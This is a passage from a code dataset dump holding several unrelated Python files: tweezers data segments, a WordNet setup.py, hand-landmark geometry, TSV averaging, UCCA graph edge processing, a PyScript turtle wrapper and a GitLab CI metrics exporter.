segment\n name (`str`, optional): name (ID) of the segment, defaults to ``int(tmin)``\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n # create a standard name if none is given\n if not name:\n # converting to integer seconds might cause clashes, better option?\n name = '{:.0f}'.format(tmin)\n if name in self.segments.keys():\n log.warning('Segment key \"{}\" is being overridden'.format(name))\n\n # insert segment\n self.segments[name] = IndexedOrderedDict([('tmin', tmin), ('tmax', tmax)])\n # sort segments by name\n self.segments = self.segments.sorted()\n\n return self\n\n def deleteSegment(self, segId):\n \"\"\"\n Delete the segment with the given name or numeric index.\n\n Args:\n segId (`int` or `str`): name or numeric index of the segment to delete\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n self.segments.pop(segId)\n return self\n\n def getSegment(self, segId):\n \"\"\"\n Returns the segment with the given name or numeric index.\n\n Args:\n segId (`int` or `str`): name or numeric index of the segment to return\n\n Returns:\n :class:`.TweezersDataSegment`\n \"\"\"\n\n # check if segments are available\n if not self.segments:\n raise KeyError('No segments defined')\n\n return TweezersDataSegment(self, segId)\n\n\nclass TweezersDataSegment(TweezersDataBase):\n \"\"\"\n Class to hold the data of a data segment. Can be used in the same way as :class:`.TweezersData`.\n\n Attributes:\n data (:class:`pandas.DataFrame`): experimental data\n analysis (:class:`collections.OrderedDict`): storage for analysis results\n \"\"\"\n\n def __init__(self, tdInstance, segmentId):\n \"\"\"\n Args:\n tdInstance (:class:`.TweezersData`): instance to get the segment from\n segmentId (`int` or `str`): name or numeric index of the segment to return\n \"\"\"\n\n super().__init__()\n self.__dict__ = copy.deepcopy(tdInstance.__dict__)\n # get the proper key in case numeric indexing was used\n segmentId = self.segments.key(segmentId)\n self.segment = self.segments[segmentId]\n # get rid of the other segments\n del self.segments\n # update meta dict\n self.meta['segment'] = segmentId\n self.meta['id'] = '{} - {}'.format(self.meta['id'], segmentId)\n self.meta['idSafe'] = self.meta['id'].replace('_', ' ').replace('#', '')\n\n # check if data is already read into memory and use that if available\n if 'data' in self.__dict__:\n # adjust data\n queryStr = '{} <= time <= {}'.format(self.segment['tmin'], self.segment['tmax'])\n self.data = self.data.query(queryStr)\n self.data = self.data.reset_index(drop=True)\n self.data.loc[:, 'time'] -= self.data.loc[0, 'time']\n # delete avData if available\n try:\n self.__dict__.pop('avData')\n except KeyError:\n pass\n\n @lazy\n def data(self):\n \"\"\"\n Attribute that holds the experiment data. It is evaluated lazily thus the data is read only when required.\n\n Returns:\n :class:`pandas.DataFrame`\n \"\"\"\n\n log.debug('Reading data from data source.')\n data = self.source.getDataSegment(self.segment['tmin'], self.segment['tmax'])\n self.meta, self.units, data = self.source.postprocessData(self.meta, self.units, data)\n return data\n","repo_name":"DollSimon/tweezers","sub_path":"tweezers/container/TweezersData.py","file_name":"TweezersData.py","file_ext":"py","file_size_in_byte":18679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"36708402064","text":"from setuptools import setup\n\nfrom pathlib import Path\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text(encoding=\"utf-8\")\nfrom Cython.Build import cythonize\n\nsetup(\n ext_modules=cythonize([\"WordNet/*.pyx\", \"WordNet/Similarity/*.pyx\"],\n compiler_directives={'language_level': \"3\"}),\n name='NlpToolkit-WordNet-Cy',\n version='1.0.13',\n packages=['WordNet', 'WordNet.Similarity', 'WordNet.data'],\n package_data={'WordNet': ['*.pxd', '*.pyx', '*.c', '*.py'],\n 'WordNet.Similarity': ['*.pxd', '*.pyx', '*.c'],\n 'WordNet.data': ['*.xml']},\n url='https://github.com/StarlangSoftware/TurkishWordNet-Cy',\n license='',\n author='olcay',\n author_email='olcay.yildiz@ozyegin.edu.tr',\n description='Turkish WordNet KeNet',\n install_requires=['NlpToolkit-MorphologicalAnalysis-Cy'],\n long_description=long_description,\n long_description_content_type='text/markdown'\n)\n","repo_name":"StarlangSoftware/TurkishWordNet-Cy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"12400149902","text":"from unittest import TestCase\nimport crud\nimport student\n\n\nclass TestFileRead(TestCase):\n def test_file_read_blank(self):\n crud.file_write([])\n self.assertEqual(0, len(crud.file_read()))\n\n def test_file_read(self):\n student_1 = student.Student(\"test\", \"test\", \"t11111111\", True, [])\n student_2 = student.Student(\"test\", \"test\", \"t22222222\", True, [])\n\n crud.file_write([student_1, student_2])\n students = crud.file_read()\n self.assertTrue(student_1.get_student_number() in students[0].get_student_number()\n and student_2.get_student_number() in students[1].get_student_number())\n crud.file_write([])\n","repo_name":"JoshuaShin/A01056181_1510_assignments","sub_path":"A4/test_file_read.py","file_name":"test_file_read.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"70510723898","text":"import collections\n\nimport numpy as np\nfrom numpy import typing as npt\nfrom scipy import spatial\nfrom scipy.spatial import distance\n\n__all__ = [\n \"compute_extend\",\n \"compute_distance_adjacency\",\n \"compute_hand_mean\",\n \"compute_hand_std\",\n \"compute_knuckle_direction\",\n \"compute_palm_direction\",\n \"compute_plane_shape_stats\",\n]\n\nAngleSummary = collections.namedtuple(\"AngleSummary\", \"xy yz xz\")\nPolygonStats = collections.namedtuple(\"PolygonStats\", \"area perimeter\")\nPlanes = collections.namedtuple(\"Planes\", \"xy yz xz\")\n\n\n# numpy batchable\ndef compute_extend(hand: npt.NDArray) -> tuple[float, float, float]:\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n\n min_vals = np.min(hand, axis=0)\n max_vals = np.max(hand, axis=0)\n extend = np.abs(max_vals - min_vals)\n return tuple(extend)\n\n\n# numpy batchable\ndef compute_knuckle_direction(hand: npt.NDArray) -> tuple[float, float, float]:\n \"\"\"\n Knuckle direction as vector going from pinky knuckle to index knuckle.\n \"\"\"\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n\n index_knuckle = hand[5]\n pinky_knuckle = hand[17]\n\n knuckle_direction = index_knuckle - pinky_knuckle\n return tuple(knuckle_direction)\n\n\n# numpy batchable (??? depends on np.cross)\ndef compute_palm_direction(hand: npt.NDArray) -> tuple[float, float, float]:\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n\n wrist = hand[0]\n index_knuckle = hand[5]\n pinky_knuckle = hand[17]\n\n # right hand rule 'a' vector\n wrist_index_direction = index_knuckle - wrist\n # right hasnd rule 'b' vector\n wrist_pinky_direction = pinky_knuckle - wrist\n\n # considering right hand rule\n # and given assumption that right hand was recorded\n # cross product direction is towards the camera if the inner side of the hand\n # points towards the camera too\n palm_direction = np.cross(wrist_index_direction, wrist_pinky_direction)\n return tuple(palm_direction)\n\n\ndef describe_angles(v1: npt.NDArray, v2: npt.NDArray) -> AngleSummary:\n if v1.shape != (3,) or v2.shape != (3,):\n raise ValueError(\"Vectors with incorrect shape.\")\n\n xy_ind = [0, 1]\n xz_ind = [0, 2]\n yz_ind = [1, 2]\n\n xy_angle = angle_between(v1[xy_ind], v2[xy_ind])\n xz_angle = angle_between(v1[xz_ind], v2[xz_ind])\n yz_angle = angle_between(v1[yz_ind], v2[yz_ind])\n return AngleSummary(xy_angle, yz_angle, xz_angle)\n\n\ndef compute_distance_adjacency(hand: npt.NDArray, dim: str = \"all\") -> npt.NDArray:\n dims = {\"all\": [0, 1, 2], \"x\": [0], \"y\": [1], \"z\": [2]}\n dim_indices = dims[dim]\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n return distance.cdist(hand[:, dim_indices], hand[dim_indices], metric=\"euclidean\")\n\n\n# numpy batchable\ndef compute_hand_mean(hand: npt.NDArray, part: str = \"all\") -> npt.NDArray:\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n\n parts = {\n \"all\": list(range(21)),\n \"thumb\": [1, 2, 3, 4],\n \"index_finger\": [5, 6, 7, 8],\n \"middle_finger\": [9, 10, 11, 12],\n \"ring_finger\": [13, 14, 15, 16],\n \"pinky\": [17, 18, 19, 20],\n }\n indices = parts[part]\n return np.mean(hand[indices], axis=0)\n\n\n# numpy batchable\ndef compute_hand_std(hand: npt.NDArray, part: str = \"all\") -> npt.NDArray:\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n\n parts = {\n \"all\": list(range(21)),\n \"thumb\": [1, 2, 3, 4],\n \"index_finger\": [5, 6, 7, 8],\n \"middle_finger\": [9, 10, 11, 12],\n \"ring_finger\": [13, 14, 15, 16],\n \"pinky\": [17, 18, 19, 20],\n }\n indices = parts[part]\n return np.std(hand[indices], axis=0)\n\n\ndef compute_polygon_stats(polygon: spatial.ConvexHull) -> PolygonStats:\n area = shoelace_formula(polygon.points[polygon.vertices])\n perimeter = polygon.area\n return PolygonStats(area, perimeter)\n\n\ndef compute_plane_shape_stats(hand: npt.NDArray) -> Planes[PolygonStats]:\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n\n stats_xy = compute_polygon_stats(spatial.ConvexHull(hand[:, :2]))\n stats_yz = compute_polygon_stats(spatial.ConvexHull(hand[:, 1:]))\n stats_xz = compute_polygon_stats(spatial.ConvexHull(hand[:, [0, 2]]))\n return Planes(stats_xy, stats_yz, stats_xz)\n\n\ndef unit_vector(vector: npt.NDArray) -> npt.NDArray:\n \"\"\"Returns the unit vector of the vector.\"\"\"\n return vector / np.linalg.norm(vector)\n\n\ndef angle_between(v1: npt.NDArray, v2: npt.NDArray) -> float:\n \"\"\"Returns the angle in radians between vectors 'v1' and 'v2'::\n\n Source: https://stackoverflow.com/a/13849249\n\n >>> angle_between((1, 0, 0), (0, 1, 0))\n 1.5707963267948966\n >>> angle_between((1, 0, 0), (1, 0, 0))\n 0.0\n >>> angle_between((1, 0, 0), (-1, 0, 0))\n 3.141592653589793\n \"\"\"\n v1_u = unit_vector(v1)\n v2_u = unit_vector(v2)\n return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))\n\n\ndef shoelace_formula(vertices: npt.NDArray) -> float:\n \"\"\"\n Compute the area of a 2D convex polygon using the shoelace formula.\n\n The shoelace formula calculates the area of a polygon by summing the products\n of the coordinates of adjacent vertices and then dividing by 2.\n\n Requirements:\n 1. Convexity: The polygon should be convex. For concave polygons, split them\n into multiple convex polygons for accurate results.\n 2. Vertex Order: Vertices must be specified in either clockwise or\n counterclockwise order.\n 3. Closed Polygon: Ensure that the first and last vertices of the array are\n the same to close the polygon.\n 4. Non-Self-Intersecting: The polygon should not have any self-intersections.\n 5. Non-Negative Area: The result will be positive if vertices are ordered\n counterclockwise, and negative if ordered clockwise. To ensure a positive\n result, order the vertices counterclockwise.\n 6. No Duplicates: Vertices should not contain duplicate points.\n\n Parameters:\n vertices (npt.NDArray): Array of shape [N x 2] representing the vertices\n of the polygon.\n\n Returns:\n float: Area of the convex polygon.\n\n Example:\n >>> polygon_vertices = np.array([[0, 0], [4, 0], [4, 3], [1, 2]])\n >>> area = shoelace_formula(polygon_vertices)\n >>> print(f\"The area of the polygon is {area}\")\n \"\"\"\n\n if vertices.shape[1] != 2:\n raise ValueError(\"Function only holds for 2D space.\")\n\n if vertices.shape[0] < 3:\n raise ValueError(\"A polygon must have at least three vertices.\")\n\n x = vertices[:, 0]\n y = vertices[:, 1]\n return 0.5 * np.abs(np.dot(x, np.roll(y, 1)) - np.dot(y, np.roll(x, 1)))\n","repo_name":"mniebisch/messy-stuff","sub_path":"hand_description.py","file_name":"hand_description.py","file_ext":"py","file_size_in_byte":6824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"22812722955","text":"'''\nTHIS CODE WAS WRITTEN SPECIFICALLY FOR OUR D3D12 DXR PROJECT, IT MIGHT NOT WORK AS INTENDED IN OTHER CASES.\n\nHow to run this file:\nRun the file with the input folder as argument, this folder should contain three tsv files.\nEach of these files MUST have the same amount of rows and columns, along with two headers. The first header\nsome information about the system and the second should contain the number of objects tested in each column.\n\nAn output file will be generated in the input folder called \"averages.tsv\" and will contain the averages of the \nthree tsv files.\n'''\n\n\nimport csv, sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport os\n\ninput_map = sys.argv[1]\nfile_header = ''\n\noutput_file = input_map + \"/averages.tsv\"\n\n# Remove the output file if it previously exists (to simplify code)\nexists = os.path.isfile(output_file)\nif exists:\n os.remove(output_file)\n\n\nfiles = [f for f in listdir(input_map) if isfile(join(input_map, f))]\nnumFiles = len(files)\naverages = [0] * numFiles\ncurr_file_index = 0\n\nfor input_file in files:\n # Concatinate averages for TLAS, BLAS and VRAM\n with open(input_map + \"\\\\\" + input_file, newline='') as inf:\n # Initialize the reader\n reader = csv.reader(inf, delimiter='\\t')\n\n # Get the file header (probably same for all files)\n file_header = next(reader)\n file_header = file_header[0] + \" \" + file_header[1]\n first_row = next(reader)\n #print(f'Number of columns: {len(first_row) - 1}')\n\n numRows = 0\n averages[curr_file_index] = [0] * (len(first_row) - 3)\n # Iterate through all rows\n for row in reader:\n # Iterate through each value of the row\n for i in range(1, len(row) - 2):\n averages[curr_file_index][i - 1] += float(row[i])\n numRows += 1\n\n\n for i in range(0, len(averages[curr_file_index])):\n averages[curr_file_index][i] = averages[curr_file_index][i] / numRows\n #print(f'Num objects: {first_row[i + 1]} Average: {averages[curr_file_index][i]}')\n\n curr_file_index += 1\n\n\n#print(averages)\n\nwith open(output_file, \"w+\", newline='') as of:\n writer = csv.writer(of, delimiter='\\t')\n writer.writerow([file_header])\n file_names = [os.path.splitext(f)[0] for f in files]\n #print(file_names)\n column_headers = ['#'] + file_names\n writer.writerow(column_headers)\n \n for i in range(0, len(averages[0])):\n row = []\n row.append(first_row[i + 1])\n for j in range(0, numFiles):\n row.append(averages[j][i])\n writer.writerow(row)","repo_name":"Piratkopia13/DV2551_Project_DXR","sub_path":"Average_Data.py","file_name":"Average_Data.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"23"} +{"seq_id":"69933581179","text":"import sys\nimport os\n\nfrom get_edges_from_mrp import get_mrp_edges\n\n\ndef compress_chained_cs(edge_dict, chained_c_edges, coordinated_c_edges):\n for branch in chained_c_edges:\n for chain in branch:\n for other_chain in branch:\n if chain[-1] == other_chain[0] and chain != other_chain:\n new_chain = chain + other_chain[1:]\n branch.append(new_chain)\n branch.remove(chain)\n branch.remove(other_chain)\n for chain in branch:\n if len(chain) == 2:\n turn_from = chain[-1]\n turn_to = int(str(chain[0]) + '1111')\n edge_dict[(turn_to, turn_to)] = edge_dict[(chain)]\n del edge_dict[(chain)]\n for edge in list(edge_dict.keys()):\n #will throw bug if one node is shared by 2 C edges. Fix maybe in compress_c by removing altogether?\n for i,node in enumerate(edge):\n if node in chain:\n new_edge = list(edge)\n new_edge[i] = turn_to\n new_edge = tuple(new_edge)\n edge_dict[new_edge] = edge_dict[edge]\n del edge_dict[edge]\n elif len(chain) > 2:\n zipped = list(zip(chain, chain[1:]))\n for edge in list(edge_dict):\n if edge in zipped:\n del edge_dict[edge]\n else:\n for i, node in enumerate(edge):\n if node in chain:\n new_edge = list(edge)\n new_edge[i] = chain\n new_edge = tuple(new_edge)\n edge_dict[new_edge] = edge_dict[edge]\n del edge_dict[edge]\n for (u,v) in list(edge_dict.keys()):\n if str(u) == str(v):\n del edge_dict[(u,v)]\n return edge_dict\n\n\ndef chain_cs(edge_list):\n while any([element for element in edge_list if type(element) == tuple]):\n for edge in edge_list:\n if type(edge) == tuple:\n (u, v) = edge\n chains = []\n for element in edge_list:\n if type(element) == list:\n for (s, t) in element:\n if s == u or s == v or t == u or t == v:\n for (s, t) in element:\n chains.append((s,t))\n edge_list.remove(element)\n if len(chains) == 0:\n edge_list.append([(u,v)])\n edge_list.remove((u,v))\n else:\n chains.append((u,v))\n edge_list.remove((u,v))\n edge_list.append(chains)\n else:\n return edge_list\n\ndef compress_c_edge(edge_dict):\n '''\n input: dictionary of unprocessed edges in the format (source_node, target_node): label\n output: turns the nodeid into the node with the center edge and then flips all nodes around it\n however, it takes into account chained C's e.g. u -c-> v, v-c->w and doesn't try to compress those\n as well as coordination examples\n in the mappings dict, keep track of changes made to later be able to undo them. Format is\n {is_mapped_to_after_compression: was_mapped_to_before_compression}\n '''\n vanilla_c_edges = []\n chained_c_edges = []\n shared_cs = []\n coordinated_c_edges = []\n for (u, v) in edge_dict.keys():\n if edge_dict[(u, v)] == 'C':\n vanilla_c_edges.append((u, v))\n for (u, v) in vanilla_c_edges:\n for (s, t) in edge_dict.keys():\n #chained\n if (s == v or t ==u) and edge_dict[(s, t)] == \"C\":\n if (u, v) not in chained_c_edges:\n chained_c_edges.append((u,v))\n if (s, t) not in chained_c_edges:\n chained_c_edges.append((s,t))\n #coordination\n if s == u and t!=v and (edge_dict[(s, t)] =='N' or edge_dict[(s, t)] =='C'):\n if (u, v) not in coordinated_c_edges:\n coordinated_c_edges.append((u,v))\n if (s, t) not in coordinated_c_edges:\n coordinated_c_edges.append((s,t))\n #shared C's just skip for now\n if v == t and (edge_dict[(s,t)] =='C' and edge_dict[(u,v)] =='C' and u!= s):\n shared_cs.append((s,t))\n shared_cs.append((u,v))\n for (u,v) in shared_cs:\n if (u,v) in vanilla_c_edges:\n vanilla_c_edges.remove((u,v))\n if (u,v) in chained_c_edges:\n chained_c_edges.remove((u,v))\n chained_c_edges = list(set(chained_c_edges).difference(set(coordinated_c_edges)))\n vanilla_c_edges = list(set(vanilla_c_edges).difference(set(chained_c_edges).union(set(coordinated_c_edges))))\n for (u, v) in vanilla_c_edges:\n for (s, t) in list(edge_dict.keys()):\n if t == u:\n edge_dict[(s, v)] = edge_dict[(s, t)]\n del edge_dict[(s,t)]\n for (s, t) in list(edge_dict.keys()):\n if s== u:\n edge_dict[(v, t)] = edge_dict[(s, t)]\n del edge_dict[(s,t)]\n for (u, v) in list(edge_dict.keys()):\n if u == v:\n del edge_dict[(u, v)]\n chained_c_edges = chain_cs(chained_c_edges)\n edge_dict = compress_chained_cs(edge_dict, chained_c_edges, coordinated_c_edges)\n return edge_dict\n\ndef decompress_c(edge_dict, label_dict):\n '''\n decompresses the graphs by looking for a non-terminal with tell-tale outgoing edges\n that cannot exist without a center and then takes the source node as the center\n RETURNS\n _________\n uncompressed dicts, with similar surface structure as the original uncompressed edge dict\n but instead of the original names of the nodes, we use NONTERMINAL + counter as a node id\n '''\n #n = max([i for i in label_dict.keys() if type(i) == int and label_dict[i] == 'Non-Terminal'])\n labels = [label for label in label_dict.keys()]\n if len(labels) > 0:\n n = max(labels)\n else:\n n = 0\n contracted = []\n for (u,v) in list(edge_dict.keys()):\n if label_dict[u] != 'Non-Terminal':\n if u not in contracted:\n contracted.append(u)\n for node in contracted:\n n += 1\n if type(node) != tuple:\n for (u, v) in list(edge_dict.keys()):\n if v == node:\n edge_dict[u, n] = edge_dict[(u, v)]\n del edge_dict[(u, v)]\n edge_dict[(n, v)] = 'C'\n elif u == node:\n edge_dict[(n, v)] = edge_dict[(u, v)]\n del edge_dict[(u, v)]\n #IF BUG COMMENT OUT NEXT LINE\n edge_dict[(n, node)] = 'C'\n elif type(v) == tuple:\n uncontracted = list(zip(v, v[1:]))\n edge_dict[(u, v[0])] = edge_dict[(u,v)]\n del edge_dict[(u,v)]\n for (s, t) in list(edge_dict.keys()):\n if t == v and u != s:\n edge_dict[(s, t[0])] = edge_dict[(s,t)]\n del edge_dict[(s,t)]\n for edge in uncontracted:\n edge_dict[edge] = 'C'\n return edge_dict\n","repo_name":"coli-saar/am-parser","sub_path":"ucca/process_c.py","file_name":"process_c.py","file_ext":"py","file_size_in_byte":7471,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"23"} +{"seq_id":"10347201088","text":"\"\"\"\nsaveFileTester.py\nCode by Sammy Haq\nhttps://githhub.com/sammyhaq\n\nSimple driver code for testing out SaveFileHelper.py\n\n\"\"\"\n\nimport SaveFileHelper\n\n\ndef main():\n saver = SaveFileHelper.SaveFileHelper(\"testfile.txt\")\n saver.writeData(\"10\", \"20\", \"30\")\n saver.writeData(\"40\", \"50\", \"60\")\n saver.closeHelper()\n\n\nmain()\n","repo_name":"sammyhaq/gaitmate","sub_path":"pi/FileHelper/saveFileTester.py","file_name":"saveFileTester.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"13360052279","text":"import asyncio\nimport logging\nfrom datetime import datetime, timezone\nimport sys\nimport os\nfrom flask import Flask, Response\nfrom retry import retry\nfrom prometheus.exporter import PrometheusExporter, generate_latest\nfrom gitlabApi.gitlab import GitlabApiInteraction\n\n# Create Flask App\napp = Flask(__name__)\n# Create logger\nlog_format = \"%(asctime)s.%(msecs)03dZ [%(levelname)s] %(message)s\"\nlogging.basicConfig(\n stream=sys.stdout, level=logging.INFO, format=log_format, datefmt=\"%Y-%m-%dT%H:%M:%S\"\n)\nlogger = logging.getLogger(__name__)\n# Create Prometheus Exporter\nexporter = PrometheusExporter()\n# Create gitlab api interaction class\ngitlab_api_interaction = GitlabApiInteraction()\ngroup_id = os.environ.get(\"GROUP_ID\")\nlast_fetch_time = None\n\nlogger.info(\"Process initialized\")\n\n\n# Metrics Define and Initialized\ndef init_metrics():\n # pipeline level\n exporter.add_gauge_metric(\n \"gitlab_pipeline_duration_seconds\",\n \"Duration of GitLab pipeline in seconds\",\n [\"group_id\", \"path_with_namespace\", \"pipeline_id\", \"source\", \"ref\", \"status\"],\n )\n exporter.add_gauge_metric(\n \"gitlab_pipeline_queued_duration_seconds\",\n \"Queued duration of GitLab pipeline in seconds\",\n [\"group_id\", \"path_with_namespace\", \"pipeline_id\", \"source\", \"ref\", \"status\"],\n )\n exporter.add_counter_metric(\n \"gitlab_pipeline_executed_counts\",\n \"Executed counts of GitLab pipeline\",\n [\"group_id\", \"path_with_namespace\", \"pipeline_id\", \"source\", \"ref\", \"status\"],\n )\n # job level\n exporter.add_gauge_metric(\n \"gitlab_job_duration_seconds\",\n \"Duration of GitLab job in seconds\",\n [\n \"group_id\",\n \"runner_description\",\n \"job_id\",\n \"job_name\",\n \"path_with_namespace\",\n \"source\",\n \"pipeline_id\",\n \"ref\",\n \"status\",\n ],\n )\n exporter.add_gauge_metric(\n \"gitlab_job_queued_duration_seconds\",\n \"Queued duration of GitLab job in seconds\",\n [\n \"group_id\",\n \"runner_description\",\n \"job_id\",\n \"job_name\",\n \"path_with_namespace\",\n \"source\",\n \"pipeline_id\",\n \"ref\",\n \"status\",\n ],\n )\n exporter.add_counter_metric(\n \"gitlab_job_executed_counts\",\n \"Executed counts of GitLab job\",\n [\n \"group_id\",\n \"runner_description\",\n \"job_id\",\n \"job_name\",\n \"path_with_namespace\",\n \"source\",\n \"pipeline_id\",\n \"ref\",\n \"status\",\n ],\n )\n\n# Fetch pipelines for all projects in specific group\n@retry(exceptions=Exception, tries=3, delay=1, backoff=2)\nasync def fetch_project_pipelines(start_time, end_time):\n try:\n all_pipelines = {}\n projects = await gitlab_api_interaction.get_subgroup_projects(group_id)\n pipelines = await gitlab_api_interaction.select_pipelines_for_execution(\n projects, start_time, end_time\n )\n if pipelines is not None:\n all_pipelines.update(pipelines)\n else:\n logger.info(\"No pipelines to update\")\n return all_pipelines\n except Exception as e:\n logger.error(f\"Error occurred: {e}\")\n\n\n# Fetch Jobs for all runber manager in specific group\n@retry(exceptions=Exception, tries=3, delay=1, backoff=2)\nasync def fetch_runner_jobs(start_time, end_time):\n try:\n jobs = await gitlab_api_interaction.select_jobs_for_execution(\n group_id, start_time, end_time\n )\n\n return jobs\n except Exception as e:\n logger.error(f\"Error occurred: {e}\")\n\n\n# insert metrics to default registry\nasync def collect_metrics(records, record_type):\n if not records:\n logger.info(f\"No {record_type} to collect\")\n return\n for _, record_attr in records.items():\n try:\n record_attr[\"duration\"] = record_attr[\"duration\"]\n record_attr[\"queued_duration\"] = record_attr[\"queued_duration\"]\n labels = record_attr.copy()\n del labels[\"duration\"]\n del labels[\"queued_duration\"]\n exporter.set_metric(\n f\"gitlab_{record_type}_duration_seconds\",\n labels,\n record_attr[\"duration\"],\n )\n exporter.set_metric(\n f\"gitlab_{record_type}_queued_duration_seconds\",\n labels,\n record_attr[\"queued_duration\"],\n )\n exporter.increment_metric(f\"gitlab_{record_type}_executed_counts\", labels)\n except Exception as e:\n logger.error(f\"Error occurred: {e}\")\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef index():\n return \"Ok\", 200\n\n\n@app.route(\"/metrics\", methods=[\"GET\"])\ndef expose_metrics():\n try:\n metrics_data = generate_latest()\n response = Response(metrics_data, mimetype=\"text/plain\")\n exporter.clear_metrics()\n return response\n except Exception as e:\n error_message = f\"Error occurred while exposing metrics: {e}\"\n logger.error(error_message)\n\n\nasync def start_fetch():\n while True:\n global last_fetch_time\n\n if last_fetch_time is None:\n start_time = datetime.now(timezone.utc).strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\")\n start_time = datetime.strptime(start_time, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n else:\n start_time = last_fetch_time\n logger.info(\"start_time: %s\", start_time)\n\n end_time = datetime.now(timezone.utc).strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\")\n end_time = datetime.strptime(end_time, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n logger.info(f\"end_time: {end_time}\")\n\n last_fetch_time = end_time\n # fetch pipelines and jobs\n pipelines = await fetch_project_pipelines(start_time, end_time)\n jobs = await fetch_runner_jobs(start_time, end_time)\n # collect jobs and pipelines metrics\n await collect_metrics(pipelines, \"pipeline\")\n await collect_metrics(jobs, \"job\")\n # reset gitlab class after finishing one fetch\n gitlab_api_interaction.reset_init()\n\n@retry(exceptions=Exception, tries=3, delay=1, backoff=2)\ndef run_application(): \n try:\n loop = asyncio.get_event_loop()\n asyncio_task = loop.create_task(start_fetch())\n app_task = loop.run_in_executor(None, app.run, \"0.0.0.0\", 8000)\n loop.run_until_complete(asyncio.gather(asyncio_task, app_task))\n except Exception as e:\n logging.error(f\"Error occurred: {e}\")\n\n\nif __name__ == \"__main__\":\n init_metrics()\n run_application()\n","repo_name":"Andy0223/gitlab-ci-monitoring-exporter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"44160073372","text":"# переворачивает строку, сохраняя позицию пунктуации\ndef reverse_on_punctuation(original_string):\n copy_of_original = original_string[:] + '\\0' # для отслеживания конца строки\n string_of_letters = []\n result = []\n for symbol in copy_of_original:\n if symbol.isalpha(): # формируем слово\n string_of_letters.append(symbol) # добавляем в слово\n elif not symbol.isalpha() or symbol == '\\0': # добавляем слово в резалт\n reversed_word = ''.join(string_of_letters[::-1]) # переворачиваем слово,\n result.append(reversed_word + symbol) # добавляем в резалт вместе с пунктуацией\n string_of_letters = []\n result = ''.join(result)\n return result[:-1] # без '\\0'\n\n\nmessage = input(\"Сообщение: \").split()\nnew_message = []\n\nfor word in message:\n if word.isalpha(): # не содержит пунктуации\n new_message.append(word[::-1]) # переворачиваем строку\n else: # содержит пунктуацию\n revered_word = reverse_on_punctuation(word) # переворачиваем строку с учетом пунктуации\n new_message.append(revered_word)\n\nnew_message = ' '.join(new_message)\n\nprint(\"\\nНовое сообщение:\", new_message)\n\n","repo_name":"Sergei-V-Fedorov/python-basic","sub_path":"Module18/09_message/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"8054234324","text":"from pyscript import document, window\n\nclass Turtle:\n def __init__(self):\n canvas = document.createElement(\"canvas\")\n canvas.id = \"canvas\"\n document.body.prepend(canvas)\n self.turtle = window.getTurtle(\"canvas\")\n\n async def forward(self, distance):\n await self.turtle.forward(distance)\n\n async def backward(self, distance):\n await self.turtle.backward(distance)\n\n async def left(self, angle):\n await self.turtle.left(angle)\n\n async def right(self, angle):\n await self.turtle.right(angle)\n\n async def goto(self, x, y):\n await self.turtle.goto(x, y)\n\n async def circle(self, radius):\n await self.turtle.circle(radius, 360)\n\n async def width(self, width):\n self.turtle.width(width)\n\n async def color(self, *args):\n self.turtle.color(*args)\n\n async def pencolor(self, *args):\n self.turtle.color(*args)\n\n async def fillcolor(self, *args):\n self.turtle.fillcolor(*args)\n\n async def begin_fill(self):\n self.turtle.begin_fill()\n\n async def end_fill(self):\n self.turtle.end_fill()\n\n async def penup(self):\n self.turtle.penup()\n\n async def pendown(self):\n self.turtle.pendown()\n\n async def speed(self, speed):\n self.turtle.speed(speed)\n\n async def shape(self, shape):\n self.turtle.shape(shape)\n\nclass Screen:\n def __init__(self):\n self.turtle = window.getTurtle(\"canvas\")\n \n def bgcolor(self, *args):\n self.turtle.bgcolor(*args)","repo_name":"edublocks/edublocks-pyscript","sub_path":"turtle.py","file_name":"turtle.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"43141316662","text":"import os\nimport base64\nimport io\nimport pandas as pd\n\nfrom dash import html, dash_table\n\ndef get_subdict(lst_of_dict: list, title):\n for dct in lst_of_dict:\n if dct['title'] == title:\n return dct\n\ndef get_tree_data(path):\n tree = os.walk(path)\n d_q = []\n for element in tree:\n d_q.append(element)\n\n l = []\n for a, b, c in d_q:\n di = {'title': a.split('\\\\')[-1], 